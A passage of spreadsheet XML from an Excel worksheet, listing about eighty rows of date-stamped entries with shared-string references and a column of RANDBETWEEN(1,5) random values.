        <v>5</v>
      </c>
    </row>
    <row r="6810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6810" s="1">
        <v>43426.612766203703</v>
      </c>
      <c r="C6810" t="s">
        <v>535</v>
      </c>
      <c r="D6810" t="s">
        <v>56</v>
      </c>
      <c r="E6810" t="s">
        <v>5909</v>
      </c>
      <c r="F6810">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6811" s="1">
        <v>43426.577916666669</v>
      </c>
      <c r="C6811" t="s">
        <v>330</v>
      </c>
      <c r="D6811" t="s">
        <v>494</v>
      </c>
      <c r="E6811" t="s">
        <v>6054</v>
      </c>
      <c r="F6811">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6812" s="1">
        <v>43426.567719907405</v>
      </c>
      <c r="C6812" t="s">
        <v>6</v>
      </c>
      <c r="D6812" t="s">
        <v>194</v>
      </c>
      <c r="E6812" t="s">
        <v>6055</v>
      </c>
      <c r="F6812">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6813" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6813" s="1">
        <v>43426.528287037036</v>
      </c>
      <c r="C6813" t="s">
        <v>124</v>
      </c>
      <c r="E6813" t="s">
        <v>6056</v>
      </c>
      <c r="F6813">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6814" s="1">
        <v>43426.525949074072</v>
      </c>
      <c r="C6814" t="s">
        <v>5162</v>
      </c>
      <c r="E6814" t="s">
        <v>6057</v>
      </c>
      <c r="F6814">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6815" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6815" s="1">
        <v>43426.504664351851</v>
      </c>
      <c r="C6815" t="s">
        <v>260</v>
      </c>
      <c r="E6815" t="s">
        <v>6058</v>
      </c>
      <c r="F6815">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6816" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6816" s="1">
        <v>43426.470833333333</v>
      </c>
      <c r="C6816" t="s">
        <v>6</v>
      </c>
      <c r="D6816" t="s">
        <v>25</v>
      </c>
      <c r="E6816" s="2" t="s">
        <v>6059</v>
      </c>
      <c r="F6816">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6817" s="1">
        <v>43426.468136574076</v>
      </c>
      <c r="C6817" t="s">
        <v>48</v>
      </c>
      <c r="E6817" t="s">
        <v>6060</v>
      </c>
      <c r="F6817">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6818" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6818" s="1">
        <v>43426.451701388891</v>
      </c>
      <c r="C6818" t="s">
        <v>6</v>
      </c>
      <c r="D6818" t="s">
        <v>25</v>
      </c>
      <c r="E6818" s="2" t="s">
        <v>6061</v>
      </c>
      <c r="F6818">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6819" s="1">
        <v>43426.436215277776</v>
      </c>
      <c r="C6819" t="s">
        <v>124</v>
      </c>
      <c r="E6819" t="s">
        <v>6062</v>
      </c>
      <c r="F6819">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6820" s="1">
        <v>43426.422847222224</v>
      </c>
      <c r="C6820" t="s">
        <v>103</v>
      </c>
      <c r="E6820" t="s">
        <v>6063</v>
      </c>
      <c r="F6820">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6821" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6821" s="1">
        <v>43426.420092592591</v>
      </c>
      <c r="C6821" t="s">
        <v>69</v>
      </c>
      <c r="E6821" s="2" t="s">
        <v>6064</v>
      </c>
      <c r="F6821">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6822" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6822" s="1">
        <v>43426.394409722219</v>
      </c>
      <c r="C6822" t="s">
        <v>41</v>
      </c>
      <c r="E6822" t="s">
        <v>6065</v>
      </c>
      <c r="F6822">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6823" s="1">
        <v>43426.376238425924</v>
      </c>
      <c r="C6823" t="s">
        <v>17</v>
      </c>
      <c r="E6823" t="s">
        <v>1970</v>
      </c>
      <c r="F6823">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6824" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6824" s="1">
        <v>43426.376168981478</v>
      </c>
      <c r="C6824" t="s">
        <v>17</v>
      </c>
      <c r="E6824" t="s">
        <v>1970</v>
      </c>
      <c r="F6824">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6825" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6825" s="1">
        <v>43426.376122685186</v>
      </c>
      <c r="C6825" t="s">
        <v>17</v>
      </c>
      <c r="E6825" t="s">
        <v>1970</v>
      </c>
      <c r="F6825">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6826" s="1">
        <v>43426.37605324074</v>
      </c>
      <c r="C6826" t="s">
        <v>17</v>
      </c>
      <c r="E6826" t="s">
        <v>1970</v>
      </c>
      <c r="F6826">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6827" s="1">
        <v>43426.363530092596</v>
      </c>
      <c r="C6827" t="s">
        <v>318</v>
      </c>
      <c r="E6827" t="s">
        <v>6066</v>
      </c>
      <c r="F6827">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6828" s="1">
        <v>43426.354837962965</v>
      </c>
      <c r="C6828" t="s">
        <v>48</v>
      </c>
      <c r="E6828" t="s">
        <v>6067</v>
      </c>
      <c r="F6828">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6829" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6829" s="1">
        <v>43426.347939814812</v>
      </c>
      <c r="C6829" t="s">
        <v>48</v>
      </c>
      <c r="E6829" t="s">
        <v>6068</v>
      </c>
      <c r="F6829">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6830" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6830" s="1">
        <v>43426.330208333333</v>
      </c>
      <c r="C6830" t="s">
        <v>454</v>
      </c>
      <c r="E6830" s="2" t="s">
        <v>6069</v>
      </c>
      <c r="F6830">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6831" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6831" s="1">
        <v>43426.328159722223</v>
      </c>
      <c r="C6831" t="s">
        <v>48</v>
      </c>
      <c r="E6831" t="s">
        <v>6070</v>
      </c>
      <c r="F6831">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6832" s="1">
        <v>43426.302291666667</v>
      </c>
      <c r="C6832" t="s">
        <v>65</v>
      </c>
      <c r="E6832" t="s">
        <v>6071</v>
      </c>
      <c r="F6832">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6833" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6833" s="1">
        <v>43426.267592592594</v>
      </c>
      <c r="C6833" t="s">
        <v>124</v>
      </c>
      <c r="E6833" s="2" t="s">
        <v>6072</v>
      </c>
      <c r="F6833">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6834" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A6834" s="1">
        <v>43426.257430555554</v>
      </c>
      <c r="C6834" t="s">
        <v>10</v>
      </c>
      <c r="D6834" t="s">
        <v>52</v>
      </c>
      <c r="E6834" s="2" t="s">
        <v>4680</v>
      </c>
      <c r="F6834">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6835" s="1">
        <v>43426.256574074076</v>
      </c>
      <c r="C6835" t="s">
        <v>60</v>
      </c>
      <c r="E6835">
        <v>26653218313</v>
      </c>
      <c r="F6835">
        <f t="shared" ca="1" si="106"/>
        <v>3</v>
      </c>
    </row>
    <row r="6836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6836" s="1">
        <v>43426.25644675926</v>
      </c>
      <c r="C6836" t="s">
        <v>60</v>
      </c>
      <c r="E6836">
        <v>26653218313</v>
      </c>
      <c r="F6836">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6837" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6837" s="1">
        <v>43426.247696759259</v>
      </c>
      <c r="C6837" t="s">
        <v>41</v>
      </c>
      <c r="E6837" t="s">
        <v>6073</v>
      </c>
      <c r="F6837">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6838" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6838" s="1">
        <v>43426.223877314813</v>
      </c>
      <c r="C6838" t="s">
        <v>48</v>
      </c>
      <c r="E6838" s="2" t="s">
        <v>6074</v>
      </c>
      <c r="F6838">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6839" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A6839" s="1">
        <v>43426.21738425926</v>
      </c>
      <c r="C6839" t="s">
        <v>41</v>
      </c>
      <c r="E6839" s="2" t="s">
        <v>6075</v>
      </c>
      <c r="F6839">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6840" s="1">
        <v>43426.211331018516</v>
      </c>
      <c r="C6840" t="s">
        <v>314</v>
      </c>
      <c r="E6840" t="s">
        <v>6076</v>
      </c>
      <c r="F6840">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6841" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6841" s="1">
        <v>43426.176886574074</v>
      </c>
      <c r="C6841" t="s">
        <v>253</v>
      </c>
      <c r="D6841" t="s">
        <v>312</v>
      </c>
      <c r="E6841" s="2" t="s">
        <v>6077</v>
      </c>
      <c r="F6841">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6842" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6842" s="1">
        <v>43426.149050925924</v>
      </c>
      <c r="C6842" t="s">
        <v>4852</v>
      </c>
      <c r="F6842">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6843" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6843" s="1">
        <v>43426.148912037039</v>
      </c>
      <c r="C6843" t="s">
        <v>73</v>
      </c>
      <c r="E6843" t="s">
        <v>6078</v>
      </c>
      <c r="F6843">
        <f t="shared" ca="1" si="106"/>
        <v>3</v>
      </c>
    </row>
    <row r="6844" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6844" s="1">
        <v>43426.109166666669</v>
      </c>
      <c r="C6844" t="s">
        <v>139</v>
      </c>
      <c r="E6844" t="s">
        <v>6079</v>
      </c>
      <c r="F6844">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6845" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6845" s="1">
        <v>43426.106874999998</v>
      </c>
      <c r="C6845" t="s">
        <v>140</v>
      </c>
      <c r="D6845" t="s">
        <v>847</v>
      </c>
      <c r="E6845" s="2" t="s">
        <v>6080</v>
      </c>
      <c r="F6845">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6846" s="1">
        <v>43426.053761574076</v>
      </c>
      <c r="C6846" t="s">
        <v>253</v>
      </c>
      <c r="E6846" t="s">
        <v>6081</v>
      </c>
      <c r="F6846">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6847" s="1">
        <v>43426.047395833331</v>
      </c>
      <c r="C6847" t="s">
        <v>140</v>
      </c>
      <c r="D6847" t="s">
        <v>312</v>
      </c>
      <c r="E6847" t="s">
        <v>6082</v>
      </c>
      <c r="F6847">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6848" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A6848" s="1">
        <v>43426.001134259262</v>
      </c>
      <c r="C6848" t="s">
        <v>10</v>
      </c>
      <c r="D6848" t="s">
        <v>36</v>
      </c>
      <c r="E6848" s="2" t="s">
        <v>6083</v>
      </c>
      <c r="F6848">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6849" s="1">
        <v>43425.803344907406</v>
      </c>
      <c r="C6849" t="s">
        <v>724</v>
      </c>
      <c r="F6849">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6850" s="1">
        <v>43425.706932870373</v>
      </c>
      <c r="C6850" t="s">
        <v>71</v>
      </c>
      <c r="E6850" t="s">
        <v>6084</v>
      </c>
      <c r="F6850">
        <f t="shared" ref="F6850:F6913" ca="1" si="107">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="6851" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6851" s="1">
        <v>43425.696736111109</v>
      </c>
      <c r="C6851" t="s">
        <v>10</v>
      </c>
      <c r="D6851" t="s">
        <v>244</v>
      </c>
      <c r="E6851" s="2" t="s">
        <v>6085</v>
      </c>
      <c r="F6851">
        <f t="shared" ca="1" si="107"/>
        <v>5</v>
      </c>
    </row>
    <row r="6852" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A6852" s="1">
        <v>43425.694502314815</v>
      </c>
      <c r="C6852" t="s">
        <v>107</v>
      </c>
      <c r="E6852" s="2" t="s">
        <v>6086</v>
      </c>
      <c r="F6852">
        <f t="shared" ca="1" si="107"/>
        <v>5</v>
      </c>
    </row>
    <row r="6853" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6853" s="1">
        <v>43425.655821759261</v>
      </c>
      <c r="C6853" t="s">
        <v>144</v>
      </c>
      <c r="E6853" t="s">
        <v>6087</v>
      </c>
      <c r="F6853">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6854" s="1">
        <v>43425.641041666669</v>
      </c>
      <c r="C6854" t="s">
        <v>10</v>
      </c>
      <c r="D6854" t="s">
        <v>112</v>
      </c>
      <c r="E6854" t="s">
        <v>6088</v>
      </c>
      <c r="F6854">
        <f t="shared" ca="1" si="107"/>
        <v>2</v>
      </c>
    </row>
    <row r="6855" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6855" s="1">
        <v>43425.611018518517</v>
      </c>
      <c r="C6855" t="s">
        <v>10</v>
      </c>
      <c r="D6855" t="s">
        <v>6</v>
      </c>
      <c r="E6855" s="2" t="s">
        <v>6089</v>
      </c>
      <c r="F6855">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6856" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6856" s="1">
        <v>43425.594583333332</v>
      </c>
      <c r="C6856" t="s">
        <v>10</v>
      </c>
      <c r="D6856" t="s">
        <v>17</v>
      </c>
      <c r="E6856" s="2" t="s">
        <v>6090</v>
      </c>
      <c r="F6856">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6857" s="1">
        <v>43425.571944444448</v>
      </c>
      <c r="C6857" t="s">
        <v>6</v>
      </c>
      <c r="D6857" t="s">
        <v>25</v>
      </c>
      <c r="E6857" t="s">
        <v>6091</v>
      </c>
      <c r="F6857">
        <f t="shared" ca="1" si="107"/>
        <v>2</v>
      </c>
    </row>
    <row r="6858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6858" s="1">
        <v>43425.571840277778</v>
      </c>
      <c r="C6858" t="s">
        <v>10</v>
      </c>
      <c r="D6858" t="s">
        <v>178</v>
      </c>
      <c r="E6858" t="s">
        <v>6092</v>
      </c>
      <c r="F6858">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6859" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6859" s="1">
        <v>43425.571805555555</v>
      </c>
      <c r="C6859" t="s">
        <v>10</v>
      </c>
      <c r="D6859" t="s">
        <v>178</v>
      </c>
      <c r="E6859" t="s">
        <v>6092</v>
      </c>
      <c r="F6859">
        <f t="shared" ca="1" si="107"/>
        <v>5</v>
      </c>
    </row>
    <row r="6860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6860" s="1">
        <v>43425.565023148149</v>
      </c>
      <c r="C6860" t="s">
        <v>48</v>
      </c>
      <c r="E6860" t="s">
        <v>6093</v>
      </c>
      <c r="F6860">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6861" s="1">
        <v>43425.522696759261</v>
      </c>
      <c r="C6861" t="s">
        <v>10</v>
      </c>
      <c r="D6861" t="s">
        <v>80</v>
      </c>
      <c r="E6861" t="s">
        <v>6094</v>
      </c>
      <c r="F6861">
        <f t="shared" ca="1" si="107"/>
        <v>2</v>
      </c>
    </row>
    <row r="6862" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6862" s="1">
        <v>43425.49622685185</v>
      </c>
      <c r="C6862" t="s">
        <v>10</v>
      </c>
      <c r="D6862" t="s">
        <v>89</v>
      </c>
      <c r="E6862" s="2" t="s">
        <v>6095</v>
      </c>
      <c r="F6862">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6863" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6863" s="1">
        <v>43425.484849537039</v>
      </c>
      <c r="C6863" t="s">
        <v>10</v>
      </c>
      <c r="D6863" t="s">
        <v>80</v>
      </c>
      <c r="E6863" t="s">
        <v>6096</v>
      </c>
      <c r="F6863">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6864" s="1">
        <v>43425.456446759257</v>
      </c>
      <c r="C6864" t="s">
        <v>10</v>
      </c>
      <c r="D6864" t="s">
        <v>192</v>
      </c>
      <c r="E6864" t="s">
        <v>6097</v>
      </c>
      <c r="F6864">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6865" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6865" s="1">
        <v>43425.45553240741</v>
      </c>
      <c r="C6865" t="s">
        <v>71</v>
      </c>
      <c r="D6865" t="s">
        <v>312</v>
      </c>
      <c r="E6865" s="2" t="s">
        <v>6098</v>
      </c>
      <c r="F6865">
        <f t="shared" ca="1" si="107"/>
        <v>2</v>
      </c>
    </row>
    <row r="6866" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6866" s="1">
        <v>43425.447881944441</v>
      </c>
      <c r="C6866" t="s">
        <v>559</v>
      </c>
      <c r="E6866" s="2" t="s">
        <v>6099</v>
      </c>
      <c r="F6866">
        <f t="shared" ca="1" si="107"/>
        <v>2</v>
      </c>
    </row>
    <row r="6867" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6867" s="1">
        <v>43425.446967592594</v>
      </c>
      <c r="C6867" t="s">
        <v>48</v>
      </c>
      <c r="E6867" t="s">
        <v>6100</v>
      </c>
      <c r="F6867">
        <f t="shared" ca="1" si="107"/>
        <v>2</v>
      </c>
    </row>
    <row r="6868" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6868" s="1">
        <v>43425.444710648146</v>
      </c>
      <c r="C6868" t="s">
        <v>41</v>
      </c>
      <c r="E6868" t="s">
        <v>6101</v>
      </c>
      <c r="F6868">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6869" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6869" s="1">
        <v>43425.439872685187</v>
      </c>
      <c r="C6869" t="s">
        <v>430</v>
      </c>
      <c r="E6869" s="2" t="s">
        <v>6102</v>
      </c>
      <c r="F6869">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6870" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6870" s="1">
        <v>43425.434004629627</v>
      </c>
      <c r="C6870" t="s">
        <v>6</v>
      </c>
      <c r="D6870" t="s">
        <v>194</v>
      </c>
      <c r="E6870" t="s">
        <v>6103</v>
      </c>
      <c r="F6870">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6871" s="1">
        <v>43425.431331018517</v>
      </c>
      <c r="C6871" t="s">
        <v>173</v>
      </c>
      <c r="E6871" t="s">
        <v>6104</v>
      </c>
      <c r="F6871">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6872" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6872" s="1">
        <v>43425.427106481482</v>
      </c>
      <c r="C6872" t="s">
        <v>6</v>
      </c>
      <c r="D6872" t="s">
        <v>194</v>
      </c>
      <c r="E6872" s="2" t="s">
        <v>6105</v>
      </c>
      <c r="F6872">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6873" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6873" s="1">
        <v>43425.426574074074</v>
      </c>
      <c r="C6873" t="s">
        <v>43</v>
      </c>
      <c r="E6873" s="2" t="s">
        <v>6106</v>
      </c>
      <c r="F6873">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6874" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6874" s="1">
        <v>43425.416296296295</v>
      </c>
      <c r="C6874" t="s">
        <v>48</v>
      </c>
      <c r="E6874" t="s">
        <v>6107</v>
      </c>
      <c r="F6874">
        <f t="shared" ca="1" si="107"/>
        <v>5</v>
      </c>
    </row>
    <row r="6875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6875" s="1">
        <v>43425.415381944447</v>
      </c>
      <c r="C6875" t="s">
        <v>10</v>
      </c>
      <c r="D6875" t="s">
        <v>17</v>
      </c>
      <c r="E6875" t="s">
        <v>6108</v>
      </c>
      <c r="F6875">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6876" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6876" s="1">
        <v>43425.402592592596</v>
      </c>
      <c r="C6876" t="s">
        <v>10</v>
      </c>
      <c r="E6876" s="2" t="s">
        <v>6109</v>
      </c>
      <c r="F6876">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6877" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6877" s="1">
        <v>43425.399201388886</v>
      </c>
      <c r="C6877" t="s">
        <v>48</v>
      </c>
      <c r="E6877" s="2" t="s">
        <v>6110</v>
      </c>
      <c r="F6877">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6878" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6878" s="1">
        <v>43425.3984375</v>
      </c>
      <c r="C6878" t="s">
        <v>10</v>
      </c>
      <c r="D6878" t="s">
        <v>271</v>
      </c>
      <c r="E6878" t="s">
        <v>6111</v>
      </c>
      <c r="F6878">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6879" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6879" s="1">
        <v>43425.398414351854</v>
      </c>
      <c r="C6879" t="s">
        <v>10</v>
      </c>
      <c r="D6879" t="s">
        <v>271</v>
      </c>
      <c r="E6879" t="s">
        <v>6111</v>
      </c>
      <c r="F6879">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6880" s="1">
        <v>43425.398368055554</v>
      </c>
      <c r="C6880" t="s">
        <v>10</v>
      </c>
      <c r="D6880" t="s">
        <v>271</v>
      </c>
      <c r="E6880" t="s">
        <v>6111</v>
      </c>
      <c r="F6880">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6881" s="1">
        <v>43425.398379629631</v>
      </c>
      <c r="C6881" t="s">
        <v>10</v>
      </c>
      <c r="D6881" t="s">
        <v>271</v>
      </c>
      <c r="E6881" t="s">
        <v>6111</v>
      </c>
      <c r="F6881">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6882" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6882" s="1">
        <v>43425.362407407411</v>
      </c>
      <c r="C6882" t="s">
        <v>6</v>
      </c>
      <c r="D6882" t="s">
        <v>25</v>
      </c>
      <c r="E6882" s="2" t="s">
        <v>6112</v>
      </c>
      <c r="F6882">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6883" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6883" s="1">
        <v>43425.356747685182</v>
      </c>
      <c r="C6883" t="s">
        <v>41</v>
      </c>
      <c r="F6883">
        <f t="shared" ca="1" si="107"/>
        <v>2</v>
      </c>
    </row>
    <row r="6884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6884" s="1">
        <v>43425.346319444441</v>
      </c>
      <c r="C6884" t="s">
        <v>10</v>
      </c>
      <c r="D6884" t="s">
        <v>56</v>
      </c>
      <c r="E6884" t="s">
        <v>6113</v>
      </c>
      <c r="F6884">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6885" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6885" s="1">
        <v>43425.337175925924</v>
      </c>
      <c r="C6885" t="s">
        <v>10</v>
      </c>
      <c r="D6885" t="s">
        <v>89</v>
      </c>
      <c r="E6885" t="s">
        <v>6114</v>
      </c>
      <c r="F6885">
        <f t="shared" ca="1" si="107"/>
        <v>5</v>
      </c>
    </row>
    <row r="6886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6886" s="1">
        <v>43425.312013888892</v>
      </c>
      <c r="C6886" t="s">
        <v>1414</v>
      </c>
      <c r="D6886" t="s">
        <v>312</v>
      </c>
      <c r="E6886" t="s">
        <v>6115</v>
      </c>
      <c r="F6886">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6887" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6887" s="1">
        <v>43425.297395833331</v>
      </c>
      <c r="C6887" t="s">
        <v>41</v>
      </c>
      <c r="F6887">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6888" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6888" s="1">
        <v>43425.284861111111</v>
      </c>
      <c r="C6888" t="s">
        <v>71</v>
      </c>
      <c r="E6888" s="2" t="s">
        <v>6116</v>
      </c>
      <c r="F6888">
        <f t="shared" ca="1" si="107"/>
        <v>5</v>
      </c>
    </row>
    <row r="6889" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6889" s="1">
        <v>43425.284745370373</v>
      </c>
      <c r="C6889" t="s">
        <v>776</v>
      </c>
      <c r="E6889" s="2" t="s">
        <v>6117</v>
      </c>
      <c r="F6889">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6890" s="1">
        <v>43425.275659722225</v>
      </c>
      <c r="C6890" t="s">
        <v>48</v>
      </c>
      <c r="E6890" t="s">
        <v>6118</v>
      </c>
      <c r="F6890">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6891" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6891" s="1">
